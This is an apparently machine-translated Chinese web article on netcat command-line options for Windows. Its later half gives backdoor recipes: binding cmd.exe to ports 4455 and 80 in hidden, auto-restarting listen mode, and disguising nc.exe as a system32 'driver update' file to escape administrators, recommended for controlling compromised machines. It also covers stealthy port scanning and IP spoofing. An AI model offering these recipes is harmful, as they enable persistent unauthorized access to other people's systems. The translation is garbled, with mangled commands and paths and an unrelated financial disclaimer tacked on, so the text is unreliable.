大家好，小小來為大家解答以下問題，netcat windows，netcat很多朋友還不知道，現(xiàn)在讓我們一起來看看吧！

1、 nc的全稱是NetCat，它可以建立和接受傳輸控制協(xié)議(TCP)和用戶數(shù)據(jù)報協(xié)議(UDP)之間的連接，Netcat可以在這些連接上讀寫數(shù)據(jù)，直到連接關(guān)閉。它可以手動或通過腳本與網(wǎng)絡(luò)應(yīng)用程序或應(yīng)用層的服務(wù)進行交互。從技術(shù)上講，NetCat不能生成UDP連接，因為UDP是無連接協(xié)議。NetCat沒有圖形界面，比較粗糙原始。

2、 nc的命令行

3、 nc的基本命令行形式是nc [options] host ports，其中host是要掃描的主機名或IP地址，ports可以是單個端口、端口范圍(以m-n的形式指定)或一系列由空格分隔的單個端口。

4、 -d只對Windows操作系統(tǒng)有用。該選項使NetCat工作在stealth模式，從而在MS-DOS命令提示符下運行出環(huán)境，這樣nc就可以在不保持命令窗口打開的情況下運行在監(jiān)控模式下，還可以幫助黑客隱藏和監(jiān)控NetCat實例而不被系統(tǒng)管理員發(fā)現(xiàn)。

5、 -e如果NetCat使用gaping _ security _ hole選項進行編譯，只要有人在網(wǎng)絡(luò)后臺監(jiān)聽的任何端口上建立連接，NetCat就會執(zhí)行，并且客戶端的NetCat會將I/O通過管道傳輸?shù)秸趧e處監(jiān)聽的另一個NetCat實例。使用這個選項是非常危險的，除非你很了解nc，至少你知道自己在做什么。這是在系統(tǒng)中構(gòu)建后門外殼的一種非?？焖俸唵蔚姆椒?。

6、 -i延遲間隔，表示nc在兩次數(shù)據(jù)傳輸之間等待的時間。例如，當通過管道向nc傳輸文件時，nc在傳輸下一個輸入行之前等待的秒數(shù)。當使用nc在主機的多個端口之間操作時，nc在切換到下一個端口之前等待的秒數(shù)。這可以使黑客在傳輸數(shù)據(jù)或攻擊服務(wù)時更加隱蔽，也有助于您的端口掃描不被入侵檢測系統(tǒng)和系統(tǒng)管理員發(fā)現(xiàn)。

7、 -g選項具有欺騙性。Nc支持松散的源路由。您可以在命令行上指定最多8 -g選項，以強制nc流量通過特定的IP地址。當您為流量設(shè)置偽造的源IP地址時，您可以使用此方法通過防火墻過濾或允許訪問主機列表，希望收到主機的響應(yīng)。

8、 -g該選項允許用戶使用由-G選項指定的路由列表中指定的地址作為當前的下一條路由。由于IP地址的大小為4字節(jié)(IPV4)，因此該參數(shù)始終是4字節(jié)的倍數(shù)；例如，4代表路由表中的第一個IP地址，8代表第二個IP地址，依此類推。通過偽造源路由表的一部分，這使得消息看起來非常有用。作弊路由的時候，這個功能有助于屏蔽你的位置，但是你可能收不到響應(yīng)消息，因為響應(yīng)消息會通過偽造的IP地址路由回來。

9、 -l該選項切換nc的監(jiān)控模式。該選項必須與-p選項一起使用，以告訴nc綁定到指定的TCP端口并等待傳入的連接。如果切換到-u選項，應(yīng)該使用UDP端口而不是TCP端口。

10、 -L此選項在Windows版本中很有用。當連接關(guān)閉時，使用相同的命令行選項重新啟動監(jiān)聽模式。即使初始連接已經(jīng)結(jié)束，nc也可以在沒有用戶干預(yù)的情況下接收新連接。和-l一樣，必須和-p一起使用。

11、 -n這個選項告訴我們nc不做任何主機名查找。

12、 -0對數(shù)據(jù)執(zhí)行十六進制轉(zhuǎn)儲，并將其存儲在hexfile中。命令nc-o hexfile會記錄雙向通信的數(shù)據(jù)，每行開頭會有一個'或'分別表示是傳入數(shù)據(jù)還是傳出數(shù)據(jù)。如果只想獲得傳入數(shù)據(jù)的十六進制轉(zhuǎn)儲，可以使用nc -ohexfile命令。

13、 -p讓用戶指定nc應(yīng)該使用的本地端口號。當使用帶有-l或-L選項的監(jiān)聽模式時，此參數(shù)是必需的。如果沒有為傳出連接指定該參數(shù)，nc將使用系統(tǒng)分配給它的任何端口，就像大多數(shù)其他TCP或UDP客戶端一樣。

14、 -r該參數(shù)使nc能夠隨機選擇本地和遠程端口。當使用nc獲取系統(tǒng)中大量端口的信息時，如果混合源端口和目的端口的順序看起來不像端口掃描，則此選項非常有用。當此選項與-i選項和足夠大的時間間隔結(jié)合使用時，成功掃描未被注意的端口的機會可以大大提高。

15、 -s指定nc在建立連接時使用的IP地址。這個選項允許黑客做一些工作。它允許黑客隱藏他們的IP地址或假冒他人的IP地址，但要獲得任何有關(guān)路由到他們欺騙的地址的信息，他們需要使用-g source路由選項。其次，在監(jiān)聽模式下，大多數(shù)情況下可以和一個已經(jīng)監(jiān)聽的服務(wù)“預(yù)綁定”，所有的TCP和UDP服務(wù)都綁定到某個端口。

16、 -t如果使用telnet選項進行編譯，nc可以與telnet服務(wù)器協(xié)商telnet選項。雖然它的響應(yīng)是無意義的信息，但是你可以通過這個狀態(tài)看到連接端口23的信息。

17、 -u nc使用UDP而不是TCP，它在客戶端模式和監(jiān)聽模式下都有效。

18、 -v控制nc將做什么的程度。比如用nc -v，nc只會把收到的數(shù)據(jù)吐出來。單個v可以知道它所連接或綁定的地址是否有問題，第二個v可以讓nc知道它在連接結(jié)束時發(fā)送和接收了多少數(shù)據(jù)。

19、 -w控制nc放棄連接之前等待的時間。同時，它還告訴nc在接收到標準輸入上的eof(文件結(jié)束)后，應(yīng)該等待多長時間來關(guān)閉連接并退出。如果您通過nc向遠程服務(wù)器發(fā)送命令，并希望返回大量數(shù)據(jù)(例如，向web服務(wù)器發(fā)送http命令以下載一個大文件)，則此選項非常有用。

20、 數(shù)控的具體使用

21、 C: NC。cmd.exe可以很好地隱藏一個NetCat后門。

22、 C: NC。exe-p 4455-D-L-E cmd.exe這個命令允許黑客使用NetCat返回系統(tǒng)，直到系統(tǒng)管理員看到nc.exe在任務(wù)管理器中運行，從而找到這個后門。我們也可以讓它更隱蔽。

23、 c:移動nc.exe c:windows system 32 driver update . exe

24、 c:windows系統(tǒng)32 driver update . exe-p 4455-d-L-e cmd.exe

25、 系統(tǒng)管理員可能會給一些無害的程序附加特權(quán)，如update.exe，黑客也可以隱藏命令行。

26、 c:windowssystme 32 driver update . exe

27、 cmd線：-L-p 4455-d-L-e cmd.exe

28、 丙：

29、 Nc -l-p 80監(jiān)聽端口80

30、 Nc -l -p 80 c:log.dat監(jiān)聽端口80，并將信息記錄在log.dat中。

31、 Nc -v -l -p 80監(jiān)聽端口80并顯示端口信息。

32、 Nc -vv -l -p 80監(jiān)聽端口80，并顯示更詳細的端口信息。

33、 NC-L-P 80-T-E cmd.exe監(jiān)控本地端口80的入站信息，同時將cmd.exe重定向到端口80。當有人連接時，讓cmd.exe以telnet的形式回復(fù)。當然，這個最好用在控制肉雞上。

34、 Nc -v ip端口掃描ip的一個端口。

35、 Nc -v -z ip port-port掃描ip端口到端口。

36、 Nc -v -z -u ip port-port將ip的UDP端口掃描到UDP端口。

今天本文講解到此結(jié)束，希望對你有所幫助。

　　免責(zé)聲明：本文由用戶上傳，與本網(wǎng)站立場無關(guān)。財經(jīng)信息僅供讀者參考，并不構(gòu)成投資建議。投資者據(jù)此操作，風(fēng)險自擔(dān)。 如有侵權(quán)請聯(lián)系刪除！